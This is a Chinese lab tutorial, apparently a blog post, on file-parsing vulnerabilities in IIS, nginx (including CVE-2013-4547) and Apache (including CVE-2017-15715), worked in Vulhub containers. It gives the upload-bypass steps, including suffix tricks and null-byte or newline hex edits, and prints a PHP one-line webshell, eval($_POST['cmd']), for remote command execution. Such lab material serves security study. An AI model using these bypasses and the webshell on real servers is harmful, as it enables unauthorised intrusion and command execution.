中间件解析漏洞

一、iis

1、IIS6.X

1.在iis的⽹站根⽬录新建⼀个名为x.asp的⽂件

2.在x.asp中新建⼀个jpg⽂件。内容为 asp代码  

3.在外部浏览器中访问windows2003的iis⽹站中的2.jpg 发现asp代码被执⾏

4.将2.jpg⽂件放到⽹站根⽬录下访问,发现其中的asp代码没有被解析。 由此可⻅.asp⽂件夹中的任意 ⽂件会被当做asp⽂件去执⾏

2、IIS7.X

 1.将PHP⼀句话⽊⻢写到shell.php并更改后缀为shell.jpg上传到⽬标站点...利⽤解析漏洞进⾏访 问

2.添加Shell并链接 

二、nginx

 1、nginx_parsing

进⼊以下Vulhub路径并开启容器,浏览器中访问⽹站

 制作图⽚⻢并进⾏上传...获取上传⽂件地址

 

访问以下路径,利⽤Nginx解析漏洞

 http://172.16.1.12/uploadfiles/18e2999891374a475d0687ca9f989d83.jpg/.php

2、CVE-2013-4547

开启靶机并访问靶场

直接上传 shell.php 被拦截...修改⽂件后缀为.jpg进⾏上传且在后⾯添加空格;上传成功

在.jpg后⾯添加两个空格并给上 .php 后缀,在16进制修改中将原本两个空格的 0x20 0x20 修改为如下即 0x20 0x00 进⾏发包

 

访问上传后的⽂件....由于url会将其编码,需要继续抓包修改 0x20 0x20 为 0x20 0x00

 

 

使用工具连接查看

三、apache

1、apache_parsing

进⼊Vulhub靶场并执⾏以下命令启动靶场

访问靶机并上传 shell.php.jpg ⽂件,⽂件内容为

<?php eval($_POST["cmd"]);?>

 

 

上传成功后与⽹站进⾏路径拼接

访问⽣成的shell.php并执⾏命令

2、CVE-2017-15715

进⼊Vulhub靶场并开启⽬标靶机,进⾏访问

尝试上传⼀句话⽊⻢⽂件,发现被拦截

在evil.php⽂件后⾯添加空格 0x20 在改为 0x0a 再次返送即可上传成功

访问上传的evil⽂件在后⾯加上 存在解析漏洞

使用工具连接查看

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值